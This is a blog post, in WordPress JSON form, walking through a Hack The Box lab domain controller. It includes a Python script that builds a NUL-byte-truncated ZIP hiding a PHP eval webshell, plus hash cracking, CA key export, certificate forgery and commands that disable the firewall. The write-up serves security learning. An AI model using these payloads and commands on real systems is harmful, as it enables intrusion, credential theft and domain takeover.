{"id":293,"date":"2025-06-05T13:01:31","date_gmt":"2025-06-05T05:01:31","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=293"},"modified":"2026-01-29T16:18:33","modified_gmt":"2026-01-29T08:18:33","slug":"293","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/06\/05\/293\/","title":{"rendered":"HTB Machine Certificate Penetration Test Notes"},"content":{"rendered":"<hr \/>\n<h1>Target Information<\/h1>\n<blockquote><p><strong>IP address: <\/strong><code><strong>10.129.129.191<\/strong><\/code><strong> (non-static IP address)<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>Information Gathering<\/h1>\n<h2>ICMP Check<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.129.191 (10.129.129.191) 56(84) bytes of data.\n64 bytes from 10.129.129.191: icmp_seq=1 ttl=127 time=401 ms\n64 bytes from 10.129.129.191: icmp_seq=2 ttl=127 time=428 ms\n64 bytes from 10.129.129.191: icmp_seq=3 ttl=127 time=385 ms\n64 bytes from 10.129.129.191: icmp_seq=4 ttl=127 time=344 ms\n\n--- 10.129.129.191 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 343.574\/389.503\/428.212\/30.645 ms<\/code><\/pre>\n<p>Network connectivity between the attacking machine and the target is good.<\/p>\n<h2>Firewall Check<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:19:32 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.129.129.191 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Jun  1 14:20:19 2025 -- 1 IP address (1 host up) scanned in 46.72 seconds<\/code><\/pre>\n<p>The FIN scan gives no answer for any port, so the target's firewall state cannot be determined from it.<\/p>\n<h2>Network Port Scan<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong> port scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:22:38 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.36s latency).\nNot shown: 65514 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n53\/tcp    open  domain        Simple DNS Plus\n80\/tcp    open  http          Apache httpd 2.4.58 (OpenSSL\/3.1.3 PHP\/8.0.30)\n|_http-title: Did not follow redirect to http:\/\/certificate.htb\/\n|_http-server-header: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.0.30\n88\/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 14:24:00Z)\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389\/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n445\/tcp   open  microsoft-ds?\n464\/tcp   open  kpasswd5?\n593\/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n636\/tcp   open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n3268\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb, Site: Default-First-Site-Name)\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n|_ssl-date: 2025-06-01T14:25:58+00:00; +8h00m01s from scanner time.\n3269\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)\n|_ssl-date: 2025-06-01T14:25:57+00:00; +8h00m01s from scanner time.\n| ssl-cert: Subject: commonName=DC01.certificate.htb\n| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:DC01.certificate.htb\n| Not valid before: 2024-11-04T03:14:54\n|_Not valid after:  2025-11-04T03:14:54\n5985\/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n9389\/tcp  open  mc-nmf        .NET Message Framing\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49685\/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49686\/tcp open  msrpc         Microsoft Windows RPC\n49688\/tcp open  msrpc         Microsoft Windows RPC\n49706\/tcp open  msrpc         Microsoft Windows RPC\n60590\/tcp open  msrpc         Microsoft Windows RPC\n60605\/tcp open  msrpc         Microsoft Windows RPC\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2019|10 (97%)\nOS CPE: cpe:\/o:microsoft:windows_server_2019 cpe:\/o:microsoft:windows_10\nAggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and required\n| smb2-time: \n|   date: 2025-06-01T14:25:20\n|_  start_date: N\/A\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   343.30 ms 10.10.14.1\n2   363.90 ms 10.129.129.191\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jun  1 14:25:59 2025 -- 1 IP address (1 host up) scanned in 201.47 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> open port list scan results<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Jun  1 14:27:43 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.129.191\nNmap scan report for 10.129.129.191\nHost is up (0.34s latency).\nNot shown: 65531 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n53\/udp  open  domain\n88\/udp  open  kerberos-sec\n123\/udp open  ntp\n389\/udp open  ldap\n\n# Nmap done at Sun Jun  1 14:28:28 2025 -- 1 IP address (1 host up) scanned in 45.09 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong> port detail scan results<\/strong><\/p>\n<pre><code class=\"language-plain\">(none)<\/code><\/pre>\n<p>The scans also show that the target runs <code>Windows Server 2019<\/code>, is a domain controller and additionally exposes an <code>HTTP<\/code> service; the domain is <code>certificate.htb<\/code> and the hostname is <code>dc01<\/code>.<\/p>\n<hr \/>\n<h1>Service Enumeration<\/h1>\n<h2>DNS Service (port 53)<\/h2>\n<p>Use the <code>dig<\/code> tool to query basic information from the <code>DNS<\/code> service:<\/p>\n<pre><code class=\"language-shell\">dig any certificate.htb @dc01.certificate.htb<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748760142860-48a6d126-db0d-42d2-bbf6-8365911c8a39.png\" alt=\"\" \/><\/p>\n<p>No further information was found; subdomain brute-forcing turned up no new names.<\/p>\n<h2>Kerberos Service (port 88)<\/h2>\n<p>First synchronize the clock with the target using the <code>ntpdate<\/code> tool:<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.certificate.htb<\/code><\/pre>\n<p>Then try username enumeration with the <code>kerbrute<\/code> tool, which found no user other than <code>Administrator<\/code>.<\/p>\n<h2>Web Application (port 80)<\/h2>\n<p>Open the home page: <code>http:\/\/certificate.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748768524093-d4eb7986-6a46-4b61-b214-4ccefc4d55b5.png\" alt=\"\" \/><\/p>\n<p>The target site is the showcase page of an online education platform. The home page carries <code>6<\/code> links, pointing to <code>index.php<\/code>, <code>about.php<\/code>, <code>login.php<\/code>, <code>register.php<\/code>, <code>blog.php<\/code> and <code>contacts.php<\/code>. In the middle of the home page there is a course introduction section; clicking a course block redirects to <code>course-details.php<\/code>, but viewing it requires login:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748769051186-687930c7-c11a-4341-86ed-942488eb74f7.png\" alt=\"\" \/><\/p>\n<p>Visiting <code>blog.php<\/code> shows a mock forum page; every post link on the page points to the current address. There also appears to be an <code>HTTP GET<\/code> parameter <code>search<\/code>, but the page does not change regardless of the input.<\/p>\n<p>Visiting <code>contacts.php<\/code> shows a form:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748770284485-6c7d66b8-efe9-4910-a4c0-5ea7a9cec35f.png\" alt=\"\" \/><\/p>\n<p>Tested it for <code>SQLi<\/code> and <code>XSS<\/code>, but neither is present; apart from that, an email address <code>support@certificate.htb<\/code> was found.<\/p>\n<p>Click the <code>Register<\/code> link to reach the user registration page, register a new user and log in:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748998426795-74b254c9-6d12-4133-b3b3-244cccdf66fd.png\" alt=\"\" \/><\/p>\n<p>After login it redirects to the home page, where a new link <code>Courses<\/code> appears in the top navigation bar; clicking it leads to the course selection page <code>courses.php<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1748999926694-92b3e98e-8a5d-4cdf-a9c5-cd4297687c3d.png\" alt=\"\" \/><\/p>\n<p>Click any course to reach the course purchase page <code>course-details.php<\/code>, then click the <code>Enroll<\/code> button to try to enroll in the course:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000065006-d193fcf0-3c54-4b8b-9d97-7d0df1d45198.png\" alt=\"\" \/><\/p>\n<p>At the bottom of the page, buttons for watching the course video and submitting assignments now appear:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000136284-47dba6ef-0e84-48c5-9eaf-c3ba168a62b7.png\" alt=\"\" \/><\/p>\n<p>Clicking the <code>SUBMIT<\/code> button redirects to the file upload page <code>upload.php<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000215225-3afeeb27-0fd7-4322-8681-776491eed89d.png\" alt=\"\" \/><\/p>\n<p>According to the page description, the assignment submission page only accepts <code>.pdf<\/code>, <code>.docx<\/code>, <code>.pptx<\/code> and <code>.xlsx<\/code> files; a single file of one of those four types may also be uploaded packed inside a <code>ZIP<\/code> archive.<\/p>\n<hr \/>\n<h1>Penetration Testing<\/h1>\n<h2>ZIP Filename Metadata Truncation Bypass<\/h2>\n<p>During service enumeration we already found the file upload page that implements assignment submission; now try to bypass the upload restrictions. First create a <code>TXT<\/code> file and upload it:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000730688-cc86b1ee-88ed-401f-972c-3e54973c3725.png\" alt=\"\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749000846188-505245ae-b3f8-4dbf-aee4-380fb887403c.png\" alt=\"\" \/><\/p>\n<p>The response reports a <code>MIME<\/code> type error; after changing the type to <code>application\/vnd.openxmlformats-officedocument.wordprocessingml.document<\/code>, it reports a file extension error instead:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001053426-db4d2686-b7e1-465c-b9b2-2840db6dee28.png\" alt=\"\" \/><\/p>\n<p>Further testing shows the backend uses a double whitelist in which the extension and the <code>MIME<\/code> type must match each other; if the extension is not allowed or does not correspond to the <code>MIME<\/code> type, the upload is rejected.<\/p>\n<p>Changing the extension to <code>.docx<\/code> shows that even when the extension and <code>MIME<\/code> type are both allowed and consistent, the program also checks whether the file's binary format is valid; even prepending a <code>DOCX<\/code> file header does not bypass this check:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001526652-49f172a1-b42b-485b-bd0c-00c6d4d9eb72.png\" alt=\"\" \/><\/p>\n<p>Renaming a <code>test.txt<\/code> file to <code>test.docx<\/code>, packing it in a <code>ZIP<\/code> archive and uploading it succeeds, and the file is automatically extracted:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749001732579-edd678e1-b39c-48d1-851d-b4d6289ff57c.png\" alt=\"\" \/><\/p>\n<p>Further testing shows that when a <code>ZIP<\/code> file is uploaded, the program only checks the extensions of the files inside the archive and does not validate their binary format.<\/p>\n<p>In this situation, we can pack the <code>WebShell<\/code> in the archive and bypass the check by truncating the filename string in the archive's metadata with the hex character <code>\\x00<\/code>. For example, if the <code>WebShell<\/code> is named <code>sparkle.php<\/code>, we can use the hex truncation character to turn the filename into <code>sparkle.php\\x00.docx<\/code>. Because the filename string inside a <code>ZIP<\/code> archive is unrestricted while <code>NTFS<\/code> filenames have character restrictions, the program sees the <code>.docx<\/code> extension, considers the file valid, and then calls the system <code>API<\/code> to extract it; when the operating system extracts the file, it reads the <code>\\x00<\/code> truncation character and the filename becomes <code>sparkle.php<\/code>.<\/p>\n<p>To achieve this, we use <code>Python<\/code>'s <code>zipfile<\/code> library and build the <code>ZIP<\/code> archive's file metadata ourselves:<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nimport base64\nimport zipfile\n\n# entry name with an embedded NUL byte, as described above\nphp_backdoor_name = f'sparkle.php\\x00.docx'\n# base64 of the shell payload (GIF header followed by PHP)\nphp_backdoor_content = '''\nR0lGODlhCjw\/cGhwCiAgJGNvZGUgPSAkX1BPU1RbImNvZGUiXTsKICBlY2hvKGV2YWwoJGNvZGUpKTsKPz4K\n'''\nphp_backdoor_content = base64.b64decode(php_backdoor_content).decode(\"utf-8\")\n# ZipInfo() cuts the name at the first NUL byte, so the name is\n# assigned after construction to keep the full string in the metadata\nmalicious_zipfile_metadata = zipfile.ZipInfo(filename=\"\", date_time=(2025, 6, 4, 10, 3, 0))\nmalicious_zipfile_metadata.filename = php_backdoor_name\n\nwith zipfile.ZipFile(\"sparkle.zip\", \"w\") as zip_f:\n    zip_f.writestr(malicious_zipfile_metadata, php_backdoor_content)<\/code><\/pre>\n<p>After the script has run, upload the generated <code>sparkle.zip<\/code> file:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090335285-65d0a1f8-3e22-45b0-853e-151620ac6cca.png\" alt=\"\" \/><\/p>\n<p>Then, following the observed upload path pattern, connect to the backdoor with AntSword (\u4e2d\u56fd\u8681\u5251): <code>http:\/\/certificate.htb\/static\/uploads\/371dcc2325f3edac50d1371fb8b09481\/sparkle.php<\/code> (the parameter name is <code>code<\/code>)<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090421042-eac3a770-4bc7-44eb-a8cb-e6e716b8bc10.png\" alt=\"\" \/><\/p>\n<p>Backdoor connection successful!<\/p>\n<h2>Cracking Site User Hashes to Obtain Credentials<\/h2>\n<p>After connecting to the <code>WebShell<\/code>, it turns out that although the backdoor runs, it cannot execute operating system commands and can only browse files in the system directories, so the reverse <code>Shell<\/code> is abandoned in favour of directory enumeration.<\/p>\n<p>Browsing the site's web root on the target reveals the database connection configuration script <code>C:\\xampp\\htdocs\\certificate.htb\\db.php<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749090838201-c33cc557-05c8-455b-b0c8-f7ce12c883ed.png\" alt=\"\" \/><\/p>\n<p>View its contents directly:<\/p>\n<pre><code class=\"language-php\">&lt;?php\n\/\/ Database connection using PDO\ntry {\n    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';\n    $db_user = 'certificate_webapp_user'; \/\/ Change to your DB username\n    $db_passwd = 'cert!f!c@teDBPWD'; \/\/ Change to your DB password\n    $options = [\n        PDO::ATTR_ERRMODE =&gt; PDO::ERRMODE_EXCEPTION,\n        PDO::ATTR_DEFAULT_FETCH_MODE =&gt; PDO::FETCH_ASSOC,\n    ];\n    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);\n} catch (PDOException $e) {\n    die('Database connection failed: ' . $e-&gt;getMessage());\n}\n?&gt;<\/code><\/pre>\n<p>Database connection credentials found:<\/p>\n<ul>\n<li>Database host: <code>localhost<\/code> (local to the target)<\/li>\n<li>Username: <code>certificate_webapp_user<\/code><\/li>\n<li>Password: <code>cert!f!c@teDBPWD<\/code><\/li>\n<\/ul>\n<p>Since no reverse <code>Shell<\/code> was obtained, the database cannot be accessed from a command line for now; instead the <code>Adminer<\/code> web-based database management tool is used to view the data: <a href=\"https:\/\/github.com\/vrana\/adminer\/releases\/download\/v5.3.0\/adminer-5.3.0.php\" target=\"_blank\"  rel=\"nofollow\" >Adminer - Database management in a single PHP file<\/a><\/p>\n<p>Download the file and upload it with AntSword (\u4e2d\u56fd\u8681\u5251):<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091160639-0cece627-2355-4414-a298-aabbe604a882.png\" alt=\"\" \/><\/p>\n<p>Then visit <code>http:\/\/certificate.htb\/static\/uploads\/371dcc2325f3edac50d1371fb8b09481\/adminer.php<\/code>, enter the discovered database credentials and click the login button:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091258913-55d40941-cc93-43c9-a6de-be8302d1d0ec.png\" alt=\"\" \/><\/p>\n<p>Login successful!<\/p>\n<p>After logging in, open the database <code>certificate_webapp_db<\/code>; it contains a <code>users<\/code> table that stores the site's user credentials:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091375702-dadd2d83-769d-40d5-b84d-b61ea2bf7659.png\" alt=\"\" \/><\/p>\n<p>Looking at the user list, the email address of user <code>sara.b<\/code> happens to be at <code>certificate.htb<\/code>, and the <code>C:\\Users<\/code> directory also happens to contain a home directory for the user <code>sara.b<\/code>:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091522102-10e087a2-52fb-4b87-a9fa-b84f24dc6b39.png\" alt=\"\" \/><\/p>\n<p>This suggests the site's user credentials are related to the operating system accounts. Crack the hash directly with the <code>hashcat<\/code> tool and <code>rockyou.txt<\/code>:<\/p>\n<pre><code class=\"language-powershell\">.\\hashcat.exe -m 3200 -a 0 \"`$2y`$04`$CgDe\/Thzw\/Em\/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6\" .\\rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091746899-961d8033-8b9c-45fd-a839-6d844cc29098.png\" alt=\"\" \/><\/p>\n<p>Domain user credentials found:<\/p>\n<ul>\n<li>Domain: <code>certificate.htb<\/code><\/li>\n<li>Username: <code>sara.b<\/code><\/li>\n<li>Password: <code>Blink182<\/code><\/li>\n<\/ul>\n<p>Then validate the credentials with <code>crackmapexec<\/code>:<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.certificate.htb -d certificate.htb -u sara.b -p \"Blink182\"\ncrackmapexec winrm dc01.certificate.htb -d certificate.htb -u sara.b -p \"Blink182\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749091920592-99093ccf-8a4c-4b57-8c57-9d3058dc588c.png\" alt=\"\" \/><\/p>\n<p>The domain credentials are valid and the user has <code>WinRM<\/code> login rights; log in directly with <code>evil-winrm<\/code>:<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.certificate.htb -u sara.b -p \"Blink182\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749092043894-cb685f51-b032-4b0c-a238-182430da03e7.png\" alt=\"\" \/><\/p>\n<p><strong>WinRM login successful!!<\/strong><\/p>\n<hr \/>\n<h1>Privilege Escalation<\/h1>\n<h2>Domain Relationship Enumeration<\/h2>\n<p>After logging in as <code>sara.b<\/code>, analyse the target's domain environment with the <code>BloodHound<\/code> tool. First upload the <code>SharpHound.ps1<\/code> collector script to gather the data:<\/p>\n<pre><code class=\"language-powershell\">upload ..\/..\/..\/..\/..\/opt\/BloodHound-linux-x64\/resources\/app\/Collectors\/SharpHound.ps1\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted\nImport-Module .\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -OutputPrefix \"sara.b\" -OutputDirectory C:\\Users\\sara.b\\Documents<\/code><\/pre>\n<p>After collection finishes, download the collected data:<\/p>\n<pre><code class=\"language-powershell\">ls\ndownload sara.b_20250605040605_BloodHound.zip<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749092862938-de8bbf62-b19e-4cee-bed7-b73082c46f0b.png\" alt=\"\" \/><\/p>\n<p>Then start <code>neo4j<\/code>, upload the data into <code>BloodHound<\/code>, and click <code>Analysis =&gt; Find Shortest Paths to Domain Admins<\/code> to list the shortest attack paths in the domain:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749093383800-832dcf68-d33e-4ac5-95d5-5b0e4ebf5b11.png\" alt=\"\" \/><\/p>\n<p>Members of the <code>Account Operators<\/code> group have <code>GenericAll<\/code> (full control) over the <code>ryan.k<\/code> user object.<\/p>\n<p>Clicking the <code>Account Operators<\/code> group object to view its members shows that the current user <code>sara.b<\/code> is in that group:<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749093604101-0bd0290f-7bf9-4e02-988a-34e51861d29c.png\" alt=\"\" \/><\/p>\n<p>This means the current user <code>sara.b<\/code> can directly change the credentials of user <code>ryan.k<\/code>, so this path is chosen for privilege escalation.<\/p>\n<h2>Exploiting GenericAll over a User<\/h2>\n<p>During domain relationship enumeration we already found that the current user can change the credentials of user <code>ryan.k<\/code>; now exploit this directly with the <code>Windows<\/code> <code>net<\/code> tool:<\/p>\n<pre><code class=\"language-powershell\">net user ryan.k Asd310056 \/domain<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749094162090-f624d186-4cd6-418c-b85c-ffb84a089f2b.png\" alt=\"\" \/><\/p>\n<p>Then log in directly as <code>ryan.k<\/code>:<\/p>\n<pre><code class=\"language-shell\">evil-winrm -i dc01.certificate.htb -u ryan.k -p \"Asd310056\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749094228006-db9bf703-4a40-400c-ad43-5ef45269c7cf.png\" alt=\"\" \/><\/p>\n<p>Success!<\/p>\n<h2>Exploiting SeManageVolumePrivilege<\/h2>\n<p>After logging in as <code>ryan.k<\/code>, run <code>whoami \/all<\/code> to view the current user's groups and privileges; the user has the <code>SeManageVolumePrivilege<\/code> privilege enabled. This privilege allows a user to perform disk maintenance operations, including locking or mounting and unmounting volumes, modifying volume data, defragmenting, and running disk cleanup tools.<\/p>\n<p>For this privilege, the following tool can be used to recursively modify the access control information of the main directories on the system drive, starting from the root of <code>C<\/code>:, and then escalate by reading key system files: <a href=\"https:\/\/github.com\/CsEnox\/SeManageVolumeExploit\/releases\/download\/public\/SeManageVolumeExploit.exe\" target=\"_blank\"  rel=\"nofollow\" >CsEnox\/SeManageVolumeExploit<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749095380983-cf0a28bc-bbba-4f88-a271-e2368d3d6f50.png\" alt=\"\" \/><\/p>\n<p>Since the target is a <code>Windows Active Directory<\/code> domain controller, the <code>AD CS<\/code> certificate service is certainly installed. We can use the <code>certutil<\/code> tool to export the root certificate of the certificate authority <code>CA<\/code> located under <code>C:\\Windows\\System32\\Certlog\\CertEnroll<\/code>, then use that root certificate to request a user certificate for the domain administrator from the <code>CA<\/code>, and thereby obtain the administrator's <code>NTLM<\/code> hash to complete the escalation.<\/p>\n<p>First download the <code>SeManageVolumeExploit.exe<\/code> tool and upload it to the target:<\/p>\n<pre><code class=\"language-powershell\">upload SeManageVolumeExploit.exe<\/code><\/pre>\n<p>Then change to the <code>CA<\/code> certificate directory, run the privilege exploitation tool, export the <code>CA<\/code> root certificate and download it to the attacking machine:<\/p>\n<pre><code class=\"language-powershell\">cd C:\\Windows\\System32\\certsrv\\CertEnroll\nC:\\Users\\ryan.k\\Desktop\\SeManageVolumeExploit.exe\ncertutil -exportPFX my \"Certificate-LTD-CA\" C:\\Users\\ryan.k\\Desktop\\Certificate-LTD-CA.pfx\ndownload C:\\Users\\ryan.k\\Desktop\\Certificate-LTD-CA.pfx<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749096487928-c22f090b-dd95-466a-9615-27c28c51f83f.png\" alt=\"\" \/><\/p>\n<p><code>CA<\/code> root certificate exported successfully! Next, use the <code>forge<\/code> function of <code>certipy-ad<\/code> to request a certificate for the <code>Administrator<\/code> user:<\/p>\n<pre><code class=\"language-shell\">ntpdate -s dc01.certificate.htb\ncertipy-ad forge -ca-pfx Certificate-LTD-CA.pfx -upn Administrator@certificate.htb -out administrator.pfx<\/code><\/pre>\n<p>Once obtained, use the <code>auth<\/code> function of <code>certipy-ad<\/code> to perform the certificate <code>UnPAC<\/code> request and retrieve the <code>Administrator<\/code> user's hash:<\/p>\n<pre><code class=\"language-shell\">certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.71 -domain certificate.htb -username Administrator<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749096883244-8474b047-f059-4241-a997-11426713a0e6.png\" alt=\"\" \/><\/p>\n<p>Domain administrator login credentials obtained:<\/p>\n<ul>\n<li>Domain: <code>certificate.htb<\/code><\/li>\n<li>Username: <code>Administrator<\/code><\/li>\n<li><code>NTLM<\/code> hash: <code>d804304519bf0143c14cbf1c024408c6<\/code><\/li>\n<\/ul>\n<p>Execute commands directly with <code>crackmapexec<\/code> to change the password, disable the firewall and enable Remote Desktop:<\/p>\n<pre><code class=\"language-shell\">crackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -H \"d804304519bf0143c14cbf1c024408c6\" -x \"net user Administrator Asd310056 \/domain\"\ncrackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p \"Asd310056\" -x \"netsh advfirewall set allprofiles state off\"\ncrackmapexec smb dc01.certificate.htb -d certificate.htb -u Administrator -p \"Asd310056\" -x \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p>Finally, log in to Remote Desktop with <code>xfreerdp<\/code>:<\/p>\n<pre><code class=\"language-shell\">xfreerdp \/v:dc01.certificate.htb \/u:Administrator \/p:\"Asd310056\" \/size:1440x900<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1749097502191-45ccd9f7-8008-458e-8818-c7a0eeb0d28c.png\" alt=\"\" \/><\/p>\n<p><strong>Privilege escalation successful!!!!<\/strong><\/p>\n<hr \/>\n<h1>This machine's penetration test ends here<\/h1>\n","protected":false},"excerpt":{"rendered":"<p>Target Information IP address: 10.129.129.191 (non-static IP address) Information Gathering ICMP Check PING 10.129.129.191 